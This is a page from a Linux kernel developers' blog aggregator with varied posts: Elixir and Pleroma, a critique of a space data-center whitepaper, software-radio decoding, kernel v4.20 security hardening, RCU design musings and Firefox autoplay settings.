Unfortunately, aside from being somewhat complex by its nature, Pleroma is written in Elixir, which is to Erlang what Kotlin is to Java, I gather. Lain explains it thus:

As I had written a social network in Ruby for my work at around that time, I wanted to apply my [negative] experience to a new project. [...] This was also to get some experience with Elixir and the Erlang ecosystem, which seemed like a great fit for a fediverse server — and I think it is.

and to re-iterate:

When I started writing Pleroma I was already writing a social network in Ruby for my day job. Because of that, I knew a lot about the pain points of doing it with Ruby, mostly the bad performance for anything involving concurrency. I had written a Bittorrent DHT client in Elixir, so I knew that it would work well for this kind of software. I was also happy to work with functional programming again, which I like very much.

Anyway, it's all water under the bridge, and if I want to understand why Xprime@Mu is stuck, I need to learn Elixir. Early signs are not that good. Right away, it uses its own control tool, called "mix", which replaces make(1), packaging, and a few other things. Sasuga desu, as they say in my weeb neighbourhood. Every goddamn language does that nowadays.


[1] It's trickier, actually. For an inexplicable reason, Alice sees some updates by X: for example, re-posts.

February 22, 2019 09:14 PM

Pavel Machek: Certified danger

I suspected the Linux Foundation went to the dark side when they started strange deals with Microsoft, but now I'm pretty sure of it. https://venturebeat.com/2019/02/21/linux-foundation-elisa/ If Linux can be certified for safety-critical stuff, it means your certification requirements are _way_ too low. People are using microkernels for critical stuff for a reason...

February 22, 2019 01:38 PM

February 11, 2019

Pete Zaitcev: Feynman on discussions among great men

One of the first experiences I had in this project at Princeton was meeting great men. I had never met very many great men before. But there was an evaluation committee that had to try to help us along, and help us ultimately decide which way we were going to separate the uranium. This committee had men like Compton and Tolman and Smyth and Urey and Rabi and Oppenheimer on it. I would sit in because I understood the theory of how our process of separating isotopes worked, and so they'd ask me questions and talk about it. In these discussions one man would make a point. Then Compton, for example, would explain a different point of view. He would say it should be this way, and was perfectly right. Another guy would say, well, maybe, but there's this other possibility we have to consider against it.

So everybody is disagreeing, all around the table. I am surprised and disturbed that Compton doesn't repeat and emphasize his point. Finally, at the end, Tolman, who's the chairman, would say, "Well, having heard all these arguments, I guess it's true that Compton's argument is the best of all, and now we have to go ahead."

It was such a shock to me to see that a committee of men could present a whole lot of ideas, each one thinking of a new facet, while remembering what the other fella said, so that, at the end, the decision is made as to which idea was the best — summing it all up — without having to say it three times. These were very great men indeed.

Life on l-k before CoC.

February 11, 2019 07:52 PM

February 06, 2019

Pete Zaitcev: SpaceBelt whitepaper

I pay special attention to my hometown rocket enterprise, Firefly. So, it didn't escape my notice when Dr. Tom Markusic mentioned SpaceBelt in SatMagazine as a potential user of launch services:

Cloud Constellation Corporation capped off 2018 funding announcements with a $100 million capital raise for space-based data centers [...]

Not a large amount of funding, but nonetheless, what are they trying to do? The official answer is provided in the whitepaper on their website.

The orbiting belt provides a greater level of security, independence from jurisdictional control, and eliminating the need for terrestrial hops for a truly worldwide network. Access to the global network is via direct satellite links, providing for a level of flexibility and security unheard of in terrestrial networks.

SpaceBelt provides a solution – a space-based storage layer for highly sensitive data providing isolation from conventional internet networks, extreme physical isolation, and sovereign independent data storage resources.

Although not pictured in the illustrations, the text permits users direct access, which will become important later:

Clients can purchase or lease specialized very-small-aperture terminals (VSATs) which have customized SpaceBelt transceivers allowing highly-secure access to the network.

Interesting. But a few thoughts spring to mind.

Isolation from the Internet is vulnerable to the usual gateway problem, unintentional or malicious. If only application-level access is provided, a compromised gateway only accesses its own account. So that's fine. However, if state security services were able to insert malware into Iran's nuclear facilities, I think that the isolation may not be as impregnable as purported.

Consider also that system control has to be provided somehow, so they must have a control facility. In terms of vulnerabilities to governments and physical attacks, it is an equivalent of a datacenter hosting the intercontinental cluster's control plane, located at the point where master ground station is. In case of SpaceBelt, it is identified as "Network Management Center".

In addition, the space location invites a new spectrum of physical attacks: now the adversary can cook your data with microwaves or lasers, instead of launching ICBMs. It's a significantly lower barrier to entry.

Turning this around, it might be cheaper to store the data where the NMC is, since the physical security measures are the same but the vulnerabilities are fewer.

Of course the physical security includes a legal aspect. The whitepaper nods to "jurisdictional independence" several times. They don't explain what they mean, but they may be trying to imply that the data sent from the ground to the SpaceBelt does not traverse the ground infrastructure where the NMC is located, and therefore is not subject to any legal restrictions there, such as GDPR.

Very nice, and IANAL, but doesn't the Outer Space Treaty establish a regime of absolute responsibility for signatory nations? I only know that the OST is quite unlike the Law of the Sea: because of the absolute responsibility, there is no salvage. Therefore, a case can be made that if the responsible nation is under GDPR, the whole SpaceBelt is too.

The above considerations apply to the "sovereign" or national data, but international business faces more. The whitepaper implies that accessing the data may be a simple matter of "leasing VSATs", but governments still have the power to deny this access. Usually radio frequency licensing is involved, as in the case of OneWeb in Russia. The whitepaper mentions using traditional GSO comsats as relays, thus shifting the radio spectrum licensing hurdles onto the comsat operators. But there may be outright bans as well. I'm sure the Communist government of mainland China will not be happy if SpaceBelt users start downloading Falun Gong literature from space.

One other thing. If frying SpaceBelt with lasers is too hard, there are other ways. Russia, for example, is experimenting with a rogue satellite that approaches comsats. It's not doing anything too bad to them at present, but so much for the "extreme physical isolation". If you thought that using a SpaceBelt VSAT would isolate you from the risk of Russian submarines tapping undersea cables, you might want to reconsider.

Overall, it's not like I would not love to work at Cloud Constellation Corporation, implementing the basic technologies their project needs. Sooner or later, humanity will have computing in space, might as well do it now. But their pitch needs work.

Finally, for your amusement:

In the future, the SpaceBelt system will be enabled to host docker containers allowing for on-orbit data processing in-situ with data storage.

Congratulations, Docker. You've become the xerox of the cloud. (In the U.S., Xerox was ultimately successful in fighting the dilution: everyone now uses the word "photocopy". Not that litigation helped them remain relevant.)

February 06, 2019 08:50 PM

January 29, 2019

Paul E. Mc Kenney: Article review: "The Hard Truth About Innovative Cultures"

There has been much ink spilled about innovation over the past decades, but this article from Harvard Business Review is the first one that really rings true with my experiences. The main point of this article is that much prior writing has focused on the fun aspects of innovation, and points out some additional hard work that is absolutely required for meaningful innovation. The authors put forth five maxims, each of which is discussed below.

Tolerance for failure but no tolerance for incompetence. This maxim is the one that rings most true with me: Innovation's progress is often measured in errors per hour, but the errors have to be productive errors that either eliminate classes of potential solutions from consideration or that better approximate a useful solution. And in my experience, extreme competence is required to make the right mistakes, that is, the mistakes that will generate the experience required to eventually arrive at a workable solution.

However, this maxim is also the one that I am most uncomfortable with. The discomfort stems from the choice of the word “incompetence”. After all, what is incompetence? The old apprentice/journeyman/master trichotomy is a useful guide. An apprentice is expected to do useful work if overseen by a journeyman or master. A journeyman is expected to be capable of carrying out a wide range of tasks without guidance. A master is expected to be able to extend the state of the art as needed to complete the task at hand. Clearly, there is a wide gulf between the definition of “incompetence” appropriate for an apprentice on the one hand and a master on the other. The level of competence required for this sort of work is not a function of education, certifications, or seniority, but instead requires a wide range of deep skills and experience combined with a willingness to learn things the hard way, along with a tolerance for the confusion and disorder that usually accompanies innovation. In short, successful innovation requires the team have a fair complement of masters. Yet it makes absolutely no sense to label as “incompetent” an accomplished journeyman, even if said journeyman is a bit uncreative and disorder-intolerant.

All that aside, “Tolerance for failure but no tolerance for non-mastery” doesn't exactly roll off the tongue, and besides which, large projects would have ample room for apprentices and journeymen, for example, our hypothetical accomplished but disorder-intolerant journeyman might be an excellent source of feedback. And in fact, master-only teams tend to be quite small [PDF, paywalled, sorry!]. I therefore have no suggestions for improvement. And wording quibbles aside, this maxim seems to me to be the most important of the five by far.

Willingness to experiment but highly disciplined. Although it is true that sometimes the only way forward is a random walk, it is still critically important to keep careful records of the experiments and their outcomes. It is often the case that last week's complete and utter failure turns out to contain the seeds of this week's step towards success, and sometimes patterns within a depressing morass of failures point the way to eventual success. The article also makes the excellent point that stress-testing ideas early on avoids over-investing in the inevitable blind alleys.

Psychologically safe but brutally candid. We all fall in love with our ideas, and therefore we all need the occasional round of “frank and open” feedback. If nothing else, we should design our experiments (or, in software, our validation suites) to provide that feedback.

Collaboration but with individual accountability. Innovation often requires that individuals and teams buck the common wisdom, but common wisdom often carries the day. Therefore, those individuals and teams must remain open to feedback, and accountability is one good way to help them seek out feedback and take that feedback seriously.

Flat but strong leadership. Most of my innovation has been carried out by very small teams, so this maxim has not been an issue for me. But people wishing to create large but highly innovative teams would do well to read this part of the article very carefully.

In short, this is a great article, and to the best of my knowledge the first one presenting both the fun and hard-work sides of the process of innovation. Highly recommended!

January 29, 2019 06:43 PM

James Morris: Save the Dates! Linux Security Summit Events for 2019.

There will be two Linux Security Summit (LSS) events again this year:

Stay tuned for CFP announcements!

January 29, 2019 05:35 PM

January 06, 2019

Pete Zaitcev: Reinventing a radio wheel

I tinker with software radio as a hobby and I am stuck solving a very basic problem. But first, a background exposition.

Bdale, what have you done to me

Many years ago, I attended an introductory lecture on software radio at a Linux conference we used to have - maybe OLS, maybe LCA, maybe even ALS/Usenix. Bdale Garbee was presenting, whom I mostly knew as a Debian guy. He outlined a vision of Software Defined Radio: take what used to be a hardware problem, re-frame it as a software problem, and let hackers hack on it.

Back then, people literally had sound cards as receiver back-ends, so all Bdale and his cohorts could do was HF, narrow band signals. Still, the idea seemed very powerful to me and caught my imagination.

A few years ago, the RTL-SDR appeared. I wanted to play with it, but nothing worthy came to mind, until I started flying and thus looking into various aviation data link signals, in particular ADS-B and its relatives TIS and FIS.

Silly government, were feet and miles not enough for you

At the time the FAA became serious about ADS-B, two data link standards were available: Extended Squitter aka 1090ES at 1090 MHz and Universal Access Transceiver aka UAT at 978 MHz. The rest of the world was converging quickly onto 1090ES, while UAT had a much higher data rate, thus permitting e.g. transmission of weather information. The FAA sat like Buridan's ass in front of two heaps of hay, and decided to adopt both 1090ES and UAT.

Now, if airplane A is equipped with 1090ES and airplane B is equipped with UAT, they can't communicate. No problem, said the FAA, we'll install thousands of ground stations that re-transmit the signals between bands. Also, we'll transmit weather images and data on UAT. The result is that UAT carries a lot of signals all the time, which I can receive.

Before I invent a wheel, I invent an airplane

Well, I could, if I had a receiver that could decode a 1 megabit/second signal. Unfortunately, the RTL-SDR can only snap 2.8 million I/Q samples per second in theory. In practice, even less. So, I ordered an expensive receiver called AirSpy, which was said to capture 20 million samples per second.

But I was too impatient to wait for my AirSpy, so I started thinking about whether I could somehow receive UAT with the RTL-SDR, and I came up with a solution. I let it clock at exactly twice the UAT bit rate (which is a little more than 1 Mbit/s). Then, since UAT uses PSK2 encoding, I would compare phase angles between samples. Now, you cannot know for sure where the bits fall across your samples, but you can look at the decoded bits and see whether they are garbage or a packet. Voila: making the impossible possible, right at Shannon's boundary.
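
The core of the trick fits in a few lines. Here is a minimal userspace sketch of deciding a bit from the phase angle between consecutive I/Q samples; the threshold is illustrative, not taken from the actual dump978 code:

    #include <complex.h>
    #include <math.h>

    /* Phase difference between consecutive samples: arg(cur * conj(prev)).
     * For PSK2, a phase flip of about pi means the bit toggled. */
    static int phase_flipped(float complex prev, float complex cur)
    {
        float dphi = cargf(cur * conjf(prev));

        return fabsf(dphi) > (float)M_PI / 2;
    }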

When I posted my code to github, it turned out that a British gentleman by the handle of mutability was thinking about the same thing. He contributed a patch or two, but he also had his own codebase, at which I hacked a bit too. His code was performing better, and it found a wide adoption under the name dump978.

Meanwhile, the AirSpy problem

AirSpy ended up collecting dust, until now. I started playing with it recently, using the 1090ES signal for tests. It was supposed to be easy... Unlike the phase-shift keying of UAT, 1090ES is a much simpler signal: a rising edge is 1, a falling edge is 0, and a stable level is invalid, used only in the preamble. How hard can it be, right? Even when I found that AirSpy only delivers the real component, it seemed immaterial: 1090ES is not phase-encoded.

But boy, was I wrong. To begin with, I need to hunt for a preamble, which synchronizes the clocks for the remainder of the packet. Here's what it looks like:

The fat green square line on the top is a sample that I stole from our German friends. The thin green line is a 3-sample average of abs(sample). And the purple is raw samples off the AirSpy, real-only.

My first idea was to compute a "discriminant" function, a kind of integrated difference between the ideal function (in fat green) and the actual signal. If the discriminant is smaller than a threshold, we have our preamble. The idea was a miserable failure. The problem is, the signal is noisy. So, even when the signal is normalized, the noise in a more powerful signal inflates the discriminant enough that it becomes larger than the discriminant of the background noise.
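
In code, the discriminant amounts to something like the following sketch (illustrative only; the preamble length and the L1 distance are my choices here, not anything from a real decoder):

    #include <math.h>

    #define PREAMBLE_LEN 16     /* illustrative length */

    /* Integrated difference between the ideal preamble shape and the
     * incoming magnitude samples; smaller means a better match. */
    static float discriminant(const float *ideal, const float *sig)
    {
        float d = 0.0f;

        for (int i = 0; i < PREAMBLE_LEN; i++)
            d += fabsf(ideal[i] - sig[i]);

        /* The failure mode described above: noise grows with signal
         * power, so a strong packet can score worse than background. */
        return d;
    }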

Mind, this is a long-solved problem. Software receiver for 1090ES with AirSpy exists. I'm just playing here. Still... How do real engineers do it?

January 06, 2019 03:47 AM

December 24, 2018

Kees Cook: security things in Linux v4.20

Previously: v4.19.

Linux kernel v4.20 has been released today! Looking through the changes, here are some security-related things I found interesting:

stackleak plugin

Alexander Popov’s work to port the grsecurity STACKLEAK plugin to the upstream kernel came to fruition. While it had received Acks from x86 (and arm64) maintainers, it has been rejected a few times by Linus. With everything matching Linus’s expectations now, it and the x86 glue have landed. (The arch-specific portions for arm64 from Laura Abbott actually landed in v4.19.) The plugin tracks function calls (with a sufficiently large stack usage) to mark the maximum depth of the stack used during a syscall. With this information, at the end of a syscall, the stack can be efficiently poisoned (i.e. instead of clearing the entire stack, only the portion that was actually used during the syscall needs to be written). There are two main benefits from the stack getting wiped after every syscall. First, there are no longer “uninitialized” values left over on the stack that an attacker might be able to use in the next syscall. Next, the lifetime of any sensitive data on the stack is reduced to only being live during the syscall itself. This is mainly interesting because any information exposures or side-channel attacks from other kernel threads need to be much more carefully timed to catch the stack data before it gets wiped.

Enabling CONFIG_GCC_PLUGIN_STACKLEAK=y means almost all uninitialized variable flaws go away, with only a very minor performance hit (it appears to be under 1% for most workloads). It’s still possible that, within a single syscall, a later buggy function call could use “uninitialized” bytes from the stack from an earlier function. Fixing this will need compiler support for pre-initialization (this is under development already for Clang, for example), but that may have larger performance implications.
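
Conceptually, the end-of-syscall wipe looks like the sketch below. The real implementation is stackleak_erase() in kernel/stackleak.c; the poison value and helper names here are made up for illustration:

    #define POISON_VALUE 0xCCCCCCCCUL   /* illustrative, not the real one */

    /* Poison only the stack span actually used during the syscall. */
    static void erase_used_stack(unsigned long lowest_sp, unsigned long cur_sp)
    {
        unsigned long *p = (unsigned long *)lowest_sp;

        while ((unsigned long)p < cur_sp)
            *p++ = POISON_VALUE;
    }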

raise faults for kernel addresses in copy_*_user()

Jann Horn reworked x86 memory exception handling to loudly notice when copy_{to,from}_user() tries to access unmapped kernel memory. Prior to this, those accesses would result in a silent error (usually visible to callers as EFAULT), making it indistinguishable from a “regular” userspace memory exception. The purpose of this is to catch cases where, for example, the unchecked __copy_to_user() is called against a kernel address. Fuzzers like syzkaller weren’t able to notice very nasty bugs because writes to kernel addresses would either corrupt memory (which may or may not get detected at a later time) or return an EFAULT that looked like things were operating normally. With this change, it’s now possible to much more easily notice missing access_ok() checks. This has already caught two other corner cases even during v4.20 in HID and Xen.
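
The class of bug this catches looks like the following; the first check is what buggy callers omit (shown with the v4.20-era access_ok() signature, which still took a type argument):

    /* Correct pattern: validate the userspace pointer first. */
    if (!access_ok(VERIFY_WRITE, uptr, len))
        return -EFAULT;

    /* __copy_to_user() itself performs no range check, so calling it
     * with 'uptr' pointing into kernel memory used to fail silently;
     * it now triggers a loud warning. */
    if (__copy_to_user(uptr, kbuf, len))
        return -EFAULT;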

spectre v2 userspace mitigation

The support for Single Thread Indirect Branch Predictors (STIBP) has been merged. This allowed CPUs that support STIBP to effectively disable Hyper-Threading to avoid indirect branch prediction side-channels to expose information between userspace threads on the same physical CPU. Since this was a very expensive solution, this protection was made opt-in (via explicit prctl() or implicitly under seccomp()). LWN has a nice write-up of the details.
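
For reference, the explicit userspace opt-in looks like this sketch; the constants are in <linux/prctl.h> as of v4.20:

    #include <sys/prctl.h>
    #include <linux/prctl.h>
    #include <stdio.h>

    int main(void)
    {
        /* Ask the kernel to disable indirect branch speculation for
         * this task, enabling STIBP where the CPU supports it. */
        if (prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH,
                  PR_SPEC_DISABLE, 0, 0))
            perror("PR_SET_SPECULATION_CTRL");
        return 0;
    }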

jump labels read-only after init

Ard Biesheuvel noticed that jump labels don’t need to be writable after initialization, so their data structures were made read-only. Since they point to kernel code, they might be used by attackers to manipulate the jump targets as a way to change kernel code that wasn’t intended to be changed. Better to just move everything into the read-only memory region to remove it from the possible kernel targets for attackers.

VLA removal finished

As detailed earlier for v4.17, v4.18, and v4.19, a whole bunch of people answered my call to remove Variable Length Arrays (VLAs) from the kernel. I count at least 153 commits having been added to the kernel since v4.16 to remove VLAs, with a big thanks to Gustavo A. R. Silva, Laura Abbott, Salvatore Mesoraca, Kyle Spiers, Tobin C. Harding, Stephen Kitt, Geert Uytterhoeven, Arnd Bergmann, Takashi Iwai, Suraj Jitindar Singh, Tycho Andersen, Thomas Gleixner, Stefan Wahren, Prashant Bhole, Nikolay Borisov, Nicolas Pitre, Martin Schwidefsky, Martin KaFai Lau, Lorenzo Bianconi, Himanshu Jha, Chris Wilson, Christian Lamparter, Boris Brezillon, Ard Biesheuvel, and Antoine Tenart. With all that done, “-Wvla” has been added to the top-level Makefile so we don’t get any more added back in the future.

per-task stack canaries, powerpc

For a long time, only x86 has had per-task kernel stack canaries. Other architectures would generate a single canary for the life of the boot and use it in every task. This meant that exposing a canary from one task would give an attacker everything they needed to spoof a canary in a separate attack in a different task. Christophe Leroy has solved this on powerpc now, integrating the new GCC support for the -mstack-protector-guard-reg and -mstack-protector-guard-offset options.

Given the holidays, Linus opened the merge window before v4.20 was released, letting everyone send in pull requests in the week leading up to the release. v4.21 is in the making. :) Happy New Year everyone!

Edit: clarified stackleak details, thanks to Alexander Popov. Added per-task canaries note too.

© 2018 – 2019, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

December 24, 2018 11:59 PM

December 22, 2018

Pete Zaitcev: The New World

well I had to write a sysv init script today and I wished it was systemd

— moonman, 21 December 2018

December 22, 2018 04:41 AM

James Morris: Linux Security Summit Europe 2018 Wrap-up

The inaugural Linux Security Summit Europe (LSS-EU) was held in October, in Edinburgh, UK.

For 2018, the LSS program committee decided to add a new event in Europe, with the aim of fostering Linux security community engagement beyond North America. There are many Linux security developers and users in Europe who may not be able to obtain funding to travel to North America for the conference each year. The lead organizer and MC for LSS EU is Elena Reshetova, of Intel Finland.

This was my first LSS as a speaker, as I’ve always been the MC for the North American events. I provided a brief overview of the Linux kernel security subsystem.

Sub-maintainers of kernel security projects presented updates on their respective areas, and there were also several referred presentations.

Slides may be found here, while videos of all talks are available via this youtube playlist.

There are photos, too!

The event overall seemed very successful, with around 150 attendees. We expect to continue now to have both NA and EU LSS events each year, although there are some scheduling challenges for 2019, with several LF events happening closely together. From 2020 on, it seems we will have 4-5 months separation between the EU and NA events, which will work much better for all involved.

December 22, 2018 03:53 AM

December 20, 2018

Pete Zaitcev: And to round out the 2018

To quoth:

Why not walk down the wider path, using GNU/Linux as DOM0? Well, if you like the kernel Linux, by all means, do that! I prefer an well-engineered kernel, so I choose NetBSD. [...]

Unfortunately, NetBSD's installer now fails on many PCs from 2010 and later. [...]

Update 2018-03-11: I have given up on NetBSD/Xen and now use Gentoo GNU/Linux/Xen instead. The reason is that I ran into stability problems which survived many NetBSD updates.

You have to have a heart of stone not to laugh out loud.

P.S. Use KVM already, sheesh.

P.P.S. This fate also awaits people who don't like SystemD.

December 20, 2018 09:30 PM

December 18, 2018

Pete Zaitcev: Firefox 64 autoplay in Fedora 29

With one of the recent Firefox releases (the current version is 64), autoplay videos began to play again, although they now start muted [1]. None of the previously working methods help (e.g. the about:config setting media.autoplay.enabled), and the documented preference is not there in 64 (it was promised for 63: either that never happened, or it was removed). Extensions that purport to disable autoplay do not work.

The solution that does work is to set media.autoplay.default to 1.

Finding the working option required a bit of effort. I'm sure this post will become obsolete in a few months, and add to the Internet noise that makes it harder to find a working solution when Mozilla changes something again. But hey. Everything is shit, so whatever.

[1] Savour the bitterness of realization that an employee of Mozilla thought that autoplay was okay to permit as long as it was muted.

UPDATE 2019-04-10: They updated Firefox to v.66 "Quantum", right in the middle of F29. The above is not enough now. One must also set media.autoplay.enabled.user-gestures-needed to false. Apparently, it's a bug and may be fixed in the future.

December 18, 2018 05:53 PM

December 13, 2018

Pete Zaitcev: IBM PC XT

By whatever chance, I visited an old science laboratory where I played at times when I was a teenager. They still have a pile of old equipment, including the IBM PC XT clone that I tinkered with.

Back in the day, they also had a PDP-11, already old, which had a magnetic tape unit. They also had data sets on those tapes. The PC XT was a new hotness, and they wanted to use it for data visualization. It was a difficult task to find a place that could read the data off the tape and write to 5.25" floppies. Impossible, really.

I stepped in and went to connect the two over RS-232. I threw together a program in Turbo Pascal, which did the job of shuffling characters between MS-DOS and the mini, thus allowing one to log in and initiate a transfer of the data. I don't remember if we used an ancient Kermit, or just printed the numbers in FORTRAN, then captured them on the PC.

The PDP-11 didn't survive for me to take a picture, but the PC XT did.

December 13, 2018 06:07 AM

December 09, 2018

Paul E. Mc Kenney: Parallel Programming: December 2018 Update

This weekend features a new release of Is Parallel Programming Hard, And, If So, What Can You Do About It?.

This release features Makefile-automated running of litmus tests (both with herd and litmus tools), catch-ups with recent Linux-kernel changes, a great many consistent-style changes (including a new style-guide appendix), improved code cross-referencing, and a great many proofreading changes, all courtesy of Akira Yokosawa. SeongJae Park, Imre Palik, Junchang Wang, and Nicholas Krause also contributed much-appreciated improvements and fixes. This release also features numerous epigraphs, modernization of sample code, many random updates, and larger updates to the memory-ordering chapter, with much help from my LKMM partners in crime, whose names are now enshrined in the LKMM section of the Linux-kernel MAINTAINERS file.

As always, git://git.kernel.org/pub/scm/linux/kernel/git/paulmck/perfbook.git will be updated in real time.

Oh, and the first edition is now available on Amazon in English as well as Chinese. I have no idea how this came about, but there it is!

December 09, 2018 07:42 PM

December 03, 2018

Dave Airlie (blogspot): Open source compute stack talk from Linux Plumbers Conference 2018

I spoke at Linux Plumbers Conference 2018 in Vancouver a few weeks ago, about CUDA and the state of open source compute stacks.

The video is now available.

https://www.youtube.com/watch?v=d94N2Lu4x9s


December 03, 2018 01:43 AM

December 02, 2018

Pete Zaitcev: Twitter

First things first: I am sorry for getting passive-aggressive on Twitter, although I was mad and the medium encourages this sort of thing. But this is the world we live in: the way to deal with computers is to google the symptoms, and hope that you don't have to watch a video. Something about this world disagrees with me so much that I almost boycott Wikipedia and Stackoverflow. "Almost" means that I go very far, even Read The Fine Manuals, before I resort to them. As the path in the tweet indicated, I built Ceph from source in order to debug the problem. But as software stacks get thicker and thicker, source gets less and less useful, or at least it loses the competition to googling for symptoms. My only hope at this point is for merciful death to take me away before these trends destroy human civilization.

December 02, 2018 04:22 AM

November 04, 2018

Paul E. Mc Kenney: Book review: "Skin in the Game: Hidden Asymmetries in Daily Life"

“Antifragile” was the last volume in Nassim Taleb's Incerto series, but it has lost that distinction with the publication of “Skin in the Game: Hidden Asymmetries in Daily Life”. This book covers a great many topics, but I will focus on only a few that relate most closely to my area of expertise.

Chapter 2 is titled “The Most Intolerant Wins: The Dominance of a Stubborn Minority”. Examples include kosher and halal food, the English language (I plead guilty!!!), and many others besides. In all cases, if the majority is not overly inconvenienced by the strongly expressed needs or desires of the minority, the minority's preferences will prevail. On the one hand, I have no problem eating either kosher or halal food, so would be part of the compliant majority in that case. On the other hand, although I know bits and pieces of several languages, the only one I am fluent in is English, and I have attended gatherings where the language was English solely for my benefit. But there are limits. For example, if I were to attend a gathering in certain parts of (say) rural India or China, English might not be within the realm of possibility.

But what does this have to do with parallel programming???

This same stubborn-minority dominance appears in software, including RCU. Very few machines have more than a few tens of CPUs, but RCU is designed to accommodate thousands. Very few systems run workloads featuring aggressive real-time requirements, but RCU is designed to support low latencies (and even more so the variant of RCU present in the -rt patchset). Very few systems allow physical removal of CPUs while the system is running, but RCU is designed to support that as well. Of course, as with human stubborn minorities, there are limits. RCU handles systems with a few thousand CPUs, but probably would not do all that well on a system with a few million CPUs. RCU supports deep sub-millisecond real-time latencies, but not sub-microsecond latencies. RCU supports controlled removal and insertion of CPUs, but not surprise removal or insertion.

Chapter 6 is titled Intellectual Yet Idiot (with the entertaining subtext “Teach a professor how to deadlift”), and, as might be expected from the title, takes a fair number of respected intellectuals to task, for but two examples, Cass Sunstein and Richard Thaler. I did find the style of this chapter a bit off-putting, but I happened to read Michael Lewis's “The Undoing Project” at about the same time. This informative and entertaining book covers the work of Daniel Kahneman and Amos Tversky (whose work helped to inform that of Sunstein and Thaler), but I found the loss-aversion experiments to be unsettling. After all, what does losing (say) $100 really mean? That I will be sad for a bit? That I won't be able to buy that new book I was looking forward to reading? That I don't get to eat dinner tonight? That I go hungry for a week? That I starve to death? I just might give a very different answer in these different scenarios, mightn't I?

This topic is also covered by Jared Diamond in his most excellent book entitled “The World Until Yesterday”. In the “Scatter your land” section, Diamond discusses how traditional farmers plant multiple small and widely separated plots of land. This practice puzzled anthropologists for some time, as it does the opposite of optimizing yields and minimizing effort. Someone eventually figured out that because these traditional farmers had no way to preserve food and limited opportunities to trade it, there was no value in producing more food than they could consume. But there was value in avoiding a year in which there was no food, and farming different crops in widely separated locations greatly decreased the odds that all their crops in all their plots would fail, thus in turn minimizing the probability of starvation. In short, these farmers were not optimizing for maximum average production, but rather for maximum probability of survival.

And this tradeoff is central to most of Taleb's work to date, including “Skin in the Game”.

But what does this have to do with parallel programming???

Quite a bit, as it turns out. In theory, RCU should just run its state machine and be happy. In practice, there are all kinds of things that can stall its state machine, ranging from indefinitely preempted readers to long-running kernel threads refusing to give up the CPU to who knows what all else. RCU therefore contains numerous forward-progress checks that reduce performance slightly but which also allow RCU to continue working when the going gets rough. This sort of thing is baked even more deeply into the physical engineering disciplines in the form of the fabled engineering factor of safety. For example, a bridge might be designed to handle three times the heaviest conceivable load, thus perhaps surviving a black-swan event such as a larger-than-expected earthquake or tidal wave.

Returning to Skin in the Game, Taleb makes much of the increased quality of decisions when the decider is directly affected by them, and rightly so. However, I became uneasy about cases where the decision and effect are widely separated in time. Taleb does touch obliquely on this topic in a section entitled “How to Put Skin in the Game of Suicide Bombers”, but does not address this topic in more prosaic settings. One could take a survival-based approach, arguing that tomorrow matters not unless you survive today, but in the absence of a very big black swan, a large fraction of the people alive today will still be alive ten years from now.

But what does this have to do with parallel programming???

There is a rather interesting connection, especially when you consider that Linux-kernel RCU's useful lifespan probably exceeds my own. This is not a new thought, and is in fact why I have put so much energy into speaking and writing about RCU. I also try my best to make RCU able to stand up to whatever comes its way, with varying degrees of success over the years.

However, beyond a certain point, this practice is labeled “overengineering”, which is looked down upon within the Linux kernel community. And with good reason: Many of the troubles one might foresee will never happen, and so the extra complexity added to deal with those troubles will provide nothing but headaches for no benefit. In short, my best strategy is to help make sure that there are bright, capable, and motivated people to look after RCU after I am gone. I therefore intend to continue writing and speaking about RCU. :–)

November 04, 2018 03:54 AM

October 30, 2018

Pete Zaitcev: Where is Amazon?

Imagine, purely hypothetically, that you were a kernel hacker working for Red Hat and for whatever reason you wanted to find a new challenge at a company with a strong commitment to open source. What are the possibilities?

To begin with, as the statistics from the Linux Foundation's 2016 report demonstrate, you have to be stark raving mad to leave Red Hat. If you do, Intel and AMD look interesting (hello, Alan Cox). IBM is not bad, although since yesterday, you don't need to quit Red Hat to work for IBM anymore. Even Google, famous for being a black hole that swallows good hackers who are never heard from again, manages to put up a decent showing, Fuchsia or no. Facebook looks unimpressive (no disrespect to DaveJ intended).

Now, the no-shows. Both of them hail from Seattle, WA: Microsoft and Amazon. Microsoft made an interesting effort to adopt Linux into its public cloud, but their strategy was to make Red Hat do all the work. Well, as expected. Amazon, though, is a problem. I managed to get into an argument with David "dwmw2" Woodhouse on Facebook about it, where I brought up a somewhat dated article at The Register. The central claim is that the lack of Amazon's contributions is the result of a policy rolled down from the very top.

(...) as far as El Reg can tell, the internet titan has submitted patches and other improvements to very few projects. When it does contribute, it does so typically via a third party, usually an employee's personal account that is not explicitly linked to Amazon.

I don't know if this culture can be changed quickly, even if Bezos suddenly changes his mind.

October 30, 2018 03:26 AM

October 25, 2018

Davidlohr Bueso: Linux v4.19: Performance Goodies

This post marks one year since I began doing these kernel performance goodies write-ups, starting from v4.14. This week Greg released Linux v4.19, so here are some of the changes related to software optimization, performance, and scalability across various subsystems.

epoll: loosen irq safety when possible

The epoll code uses an irq-safe spinlock to protect concurrent operations on the ready-event linked list. However, with the exception of the callback done from the wakequeues, the lock is never taken in irq context, so there is really no need to save and restore interrupts each time it is acquired and released. For example, on x86, a POPF (irqrestore) instruction can be quite expensive, as it changes all the flags and is therefore potentially heavy on dependencies. These changes yield measurable results on a range of epoll_wait(2) microbenchmarks, around 7-20% in raw throughput. This is unsurprising, as PUSHF + POPF is more expensive than STI + CLI.
[Commit 002b343669c4, 304b18b8d6af, 92e641784055, 679abf381a18]
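
In locking API terms, the change boils down to the following (a simplified sketch; the real code in fs/eventpoll.c chooses the variant per call site, and the structure here is illustrative):

    /* Before: safe from any context, but saves/restores flags. */
    static void queue_ready_event_before(struct eventpoll *ep)
    {
        unsigned long flags;

        spin_lock_irqsave(&ep->lock, flags);
        /* ... manipulate the ready list ... */
        spin_unlock_irqrestore(&ep->lock, flags);
    }

    /* After: callers known never to run in irq context use the
     * cheaper variant and skip the PUSHF/POPF pair. */
    static void queue_ready_event_after(struct eventpoll *ep)
    {
        spin_lock_irq(&ep->lock);
        /* ... manipulate the ready list ... */
        spin_unlock_irq(&ep->lock);
    }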

sched/numa:  migrate pages to local nodes quicker early in the lifetime of a task

